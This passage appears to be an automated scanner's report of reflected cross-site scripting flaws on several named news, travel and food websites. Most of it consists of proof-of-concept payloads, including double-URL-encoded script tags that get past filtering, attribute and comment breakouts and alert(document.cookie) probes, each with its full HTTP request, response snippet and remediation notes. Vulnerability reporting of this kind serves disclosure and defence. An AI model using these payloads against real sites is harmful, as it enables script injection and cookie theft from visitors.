GET /tag/htc9412c%253cscript%253ealert%25281%2529%253c%252fscript%253e3c7d442946f HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcbb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b4dc45fda was submitted in the REST URL parameter 2. This input was echoed as fcbb6\"><script>alert(1)</script>52b4dc45fda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htcfcbb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b4dc45fda HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2474%253cscript%253ealert%25281%2529%253c%252fscript%253eb25362d2e8d was submitted in the REST URL parameter 2. This input was echoed as f2474<script>alert(1)</script>b25362d2e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htc,legendf2474%253cscript%253ealert%25281%2529%253c%252fscript%253eb25362d2e8d HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b36a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e567c0a8e367 was submitted in the REST URL parameter 2. This input was echoed as 3b36a\"><script>alert(1)</script>567c0a8e367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/htc,legend3b36a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e567c0a8e367 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e154acd0c317 was submitted in the REST URL parameter 2. This input was echoed as 12d2b\"><script>alert(1)</script>154acd0c317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mta12d2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e154acd0c317 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 698db%253cscript%253ealert%25281%2529%253c%252fscript%253e4657951d7a8 was submitted in the REST URL parameter 2. This input was echoed as 698db<script>alert(1)</script>4657951d7a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mta698db%253cscript%253ealert%25281%2529%253c%252fscript%253e4657951d7a8 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d284e2c8a was submitted in the REST URL parameter 2. This input was echoed as 6c10d\"><script>alert(1)</script>3d284e2c8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mwc6c10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d284e2c8a HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1610d%253cscript%253ealert%25281%2529%253c%252fscript%253e283ed52bb18 was submitted in the REST URL parameter 2. This input was echoed as 1610d<script>alert(1)</script>283ed52bb18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/mwc1610d%253cscript%253ealert%25281%2529%253c%252fscript%253e283ed52bb18 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c027e%253cscript%253ealert%25281%2529%253c%252fscript%253eae22f2cd84c was submitted in the REST URL parameter 2. This input was echoed as c027e<script>alert(1)</script>ae22f2cd84c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/qrcodec027e%253cscript%253ealert%25281%2529%253c%252fscript%253eae22f2cd84c HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33e62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3348f81a0eb was submitted in the REST URL parameter 2. This input was echoed as 33e62\"><script>alert(1)</script>3348f81a0eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/qrcode33e62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3348f81a0eb HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 775e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04f1a218fe4 was submitted in the REST URL parameter 2. This input was echoed as 775e9\"><script>alert(1)</script>04f1a218fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/shocker775e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04f1a218fe4 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11961%253cscript%253ealert%25281%2529%253c%252fscript%253e14990835019 was submitted in the REST URL parameter 2. This input was echoed as 11961<script>alert(1)</script>14990835019 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/shocker11961%253cscript%253ealert%25281%2529%253c%252fscript%253e14990835019 HTTP/1.1 Host: www.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1297021697012-New%7C1360093697012%3B%20s_nrgvo%3DNew%7C1360093697014%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B;
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f9ec%253cscript%253ealert%25281%2529%253c%252fscript%253ee8cf4f0c4f2 was submitted in the REST URL parameter 2. This input was echoed as 4f9ec<script>alert(1)</script>e8cf4f0c4f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/xxxe42f9%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e9716d68035d4f9ec%253cscript%253ealert%25281%2529%253c%252fscript%253ee8cf4f0c4f2 HTTP/1.1 Host: www.engadget.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b682; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b682; s_pers=%20s_getnr%3D1297024747837-Repeat%7C1360096747837%3B%20s_nrgvo%3DRepeat%7C1360096747839%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </script>9716d68035d4f9ec<script>alert(1)</script>e8cf4f0c4f2</em> ...[SNIP]...
1.561. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b80"><script>alert(1)</script>abb790fc786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?44b80"><script>alert(1)</script>abb790fc786=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/?44b80"><script>alert(1)</script>abb790fc786=1"/> ...[SNIP]...
1.562. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9308"-alert(1)-"caa87257aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f9308"-alert(1)-"caa87257aff=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.563. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58941"><script>alert(1)</script>398c3e79241 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?58941"><script>alert(1)</script>398c3e79241=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?58941"><script>alert(1)</script>398c3e79241=1"/> ...[SNIP]...
1.564. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff00e"-alert(1)-"bca20dfc346 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/?ff00e"-alert(1)-"bca20dfc346=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document ...[SNIP]...
1.565. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84204"><script>alert(1)</script>3f4f242397f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?84204"><script>alert(1)</script>3f4f242397f=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?84204"><script>alert(1)</script>3f4f242397f=1"/> ...[SNIP]...
1.566. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f45e"-alert(1)-"7ca944951cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/?9f45e"-alert(1)-"7ca944951cf=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.567. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2e2"-alert(1)-"020debb9333 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/?3e2e2"-alert(1)-"020debb9333=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.568. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69097"><script>alert(1)</script>7f8dba89625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/?69097"><script>alert(1)</script>7f8dba89625=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90cce"><script>alert(1)</script>de66471c512 was submitted in the d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=190cce"><script>alert(1)</script>de66471c512 HTTP/1.1 Host: www.gadling.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1297024929263-New%7C1360096929263%3B%20s_nrgvo%3DNew%7C1360096929265%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; VWCUK200=L020611/Q64976_12205_5_020611_1_021611_404168x403865x020611x1x1; SVWCUK200=404168_1; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.58dd; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.58dd; _BPL=undefined
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=190cce"><script>alert(1)</script>de66471c512"/> ...[SNIP]...
1.570. http://www.gadling.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gadling.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f2b"><script>alert(1)</script>ab70c602dd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7f2b"><script>alert(1)</script>ab70c602dd2=1 HTTP/1.1 Host: www.gadling.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.gadling.com/?d7f2b"><script>alert(1)</script>ab70c602dd2=1"/> ...[SNIP]...
1.571. http://www.gadling.com/2010/11/09/setai-fifth-avenue-opens-in-midtown-manhattan/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0014"><script>alert(1)</script>f02d8e32fa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/09/setai-fifth-avenue-opens-in-midtown-manhattan/?b0014"><script>alert(1)</script>f02d8e32fa6=1 HTTP/1.1 Host: www.gadling.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the plid request parameter is copied into an HTML comment. The payload ac6d3--><script>alert(1)</script>396efbd1ca8 was submitted in the plid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /clickthrough.jsp?ctyp=Booking&plid=7245874ac6d3--><script>alert(1)</script>396efbd1ca8&ptyp=D&pid=7163112&prv=nd-1036&cr=MC41MHw%3D&url=http%3A%2F%2Fwww.lq.com%2Flq%2Fcoolsavings%2Flmd%2Findex.jsp%3Fiata%3D99020530%26wt.mc_id%3Dsidestep&srch=FFS3uB&orig=HDealSynd&extsS=1297017001463&aid=ustrav&hc=FFS3uB&lid=7163112-FFS3uB&istest=false&rank=127 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta http-equiv="pragma" content="no-cache" /> <meta name="robots" content="noindex,nofollow" /> <head> <title>Error | ...[SNIP]... <!-- java.lang.NumberFormatException: For input string: "7245874ac6d3--><script>alert(1)</script>396efbd1ca8" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:458) at java.lang.Integer.parseInt(Integer.java:499) at com.r9.purveyor ...[SNIP]...
1.573. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kitchendaily.com
Path:
/chefs/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc258"><script>alert(1)</script>960b49903a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
